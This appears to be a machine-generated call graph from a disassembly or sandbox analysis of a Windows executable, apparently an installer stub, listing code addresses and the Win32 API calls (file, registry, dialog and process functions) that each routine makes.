wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 